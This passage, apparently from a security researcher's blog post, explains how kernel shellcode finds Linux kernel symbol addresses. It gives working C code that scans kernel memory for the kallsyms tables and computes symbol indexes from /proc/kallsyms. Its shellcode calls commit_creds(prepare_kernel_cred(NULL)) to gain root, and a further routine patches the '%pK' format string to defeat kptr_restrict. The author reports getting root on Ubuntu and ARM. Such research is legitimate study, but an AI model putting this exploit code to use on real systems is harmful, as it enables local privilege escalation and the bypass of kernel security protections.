#define PARTIAL_MATCH_SIZE 64

static unsigned long *kallsyms_find_name_table(void)
{
        unsigned long *addr;
        int count;

        for (addr = kernel_base;
             addr + kallsyms_names_size < kernel_base + KERNEL_LOWMEM_SIZE;
             addr++) {
                if (memcmp(addr, kallsyms_names, PARTIAL_MATCH_SIZE) != 0)
                        continue;
                if (memcmp(addr, kallsyms_names, kallsyms_names_size) != 0)
                        continue;
                return addr;
        }

        /* Couldn't find it */
        return NULL;
} 

We now know the location of the kallsyms_names array in the kernel (and have verified that our view of it from user-space is consistent with the kernel's view). From here we need to find the kallsyms_addresses table. In kernel/kallsyms.c the kallsyms_addresses array is declared immediately before the kallsyms_names array, so it should be just before it in the data section. Note that while the compiler could re-arrange these arrays, there is probably little reason for it to do so. It does, however, re-align the kallsyms_addresses array (probably for cache performance), and may move some other variables between the two arrays (notably kallsyms_num_syms). We know how many symbols there are (stored in the table_cnt variable in the scripts/kallsyms.c code), that the symbols are in order, and that all of the symbol addresses will be in the low part of the kernel's memory. This allows us to scan backwards from the beginning of the kallsyms_names table to find the kallsyms_addresses table. We first subtract table_cnt from the kallsyms_names location, and then continue going backwards while we have a valid looking kernel pointer which is less than or equal to the one above it:

 
static bool is_kernel_pointer(unsigned long value) {
        return
#ifdef X64
                /*
                 * Ubuntu 64-bit lists a bunch of data items with low
                 * addresses in /proc/kallsyms.
                 */
                (value >= 0x0 && value <= 0x20000) ||
#endif
                (value >= (unsigned long)kernel_base &&
                 value <= (unsigned long)kernel_base + KERNEL_LOWMEM_SIZE);
}

static unsigned long *kallsyms_find_addr_table(unsigned long *names_base)
{
        unsigned long *addr, prev_ptr = ~0;

        for (addr = names_base - table_cnt; addr >= kernel_base; addr--) {
                if (!is_kernel_pointer(*addr) || *addr > prev_ptr)
                        break;

                prev_ptr = *addr;
        }

        if (addr == kernel_base) {
                /* Whoops */
                return NULL;
        }

        addr++;
        return addr;
}

We now have the location of the kallsyms_addresses array. The next step is for our shell code to get the addresses of the functions it needs. The easiest way to do this is to prepare the array indexes of the functions before we enter kernel-space. We can get these from /proc/kallsyms, allowing our shell code to then do:

prepare_kernel_cred = (void *)ksyms[idx_prepare_kernel_cred];
commit_creds = (void *)ksyms[idx_commit_creds];

commit_creds(prepare_kernel_cred(NULL));
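The indexes themselves can be computed in user-space by counting built-in symbols in /proc/kallsyms until the name matches; since the file lists the built-in symbols in kallsyms table order, the line position is also the index into kallsyms_addresses. A sketch (ksym_index() is my own helper name; module symbols, identified by their “[module]” suffix, are skipped):

#include <stdio.h>
#include <string.h>

/* Return the index of a built-in symbol in /proc/kallsyms order */
static long ksym_index(const char *name)
{
        char line[256], sym[128];
        long idx = 0;
        FILE *f;

        f = fopen("/proc/kallsyms", "r");
        if (!f)
                return -1;

        while (fgets(line, sizeof(line), f)) {
                if (strchr(line, '['))  /* module symbol, not in the table */
                        continue;
                if (sscanf(line, "%*s %*s %127s", sym) == 1 &&
                    strcmp(sym, name) == 0) {
                        fclose(f);
                        return idx;
                }
                idx++;
        }

        fclose(f);
        return -1;
}

Before triggering the exploit we would then do something like idx_prepare_kernel_cred = ksym_index("prepare_kernel_cred") and idx_commit_creds = ksym_index("commit_creds").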

Return to user-space, spawn a shell, and now we are root. I’ve tested this approach using the same code on 64-bit and 32-bit versions of Ubuntu 12.04, and on Linux 3.7 running on an ARM Realview PB-A8. In each case the shell code is able to find the kallsyms_addresses array and subsequently get root.

There are also some other interesting approaches to finding the kernel symbol addresses. Spender’s enlightenment framework looks for a unique string in the kernel/kallsyms.c text, and then uses that as a starting point for finding the function kallsyms_lookup_name(), which the shell code can then use to look up the address of any symbol while running in kernel space. Another approach is to scan kernel memory for the “%pK %c %s” format string that is used to print /proc/kallsyms and replace the “K” with a space, disabling the kptr_restrict protection for that file.
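The second approach is easy to sketch using the kernel_base and KERNEL_LOWMEM_SIZE values from the code above (a sketch only, with a made-up function name; it assumes the format string is writable from the exploit's context):

/*
 * Scan the kernel's low memory for the /proc/kallsyms format string
 * and turn "%pK" into "%p ", so real addresses are printed again.
 */
static int patch_kallsyms_format(void)
{
        char *addr = (char *)kernel_base;
        char *end = (char *)kernel_base + KERNEL_LOWMEM_SIZE - 9;
        int patched = 0;

        for (; addr < end; addr++) {
                if (memcmp(addr, "%pK %c %s", 9) == 0) {
                        addr[2] = ' ';
                        patched++;
                }
        }

        return patched;
}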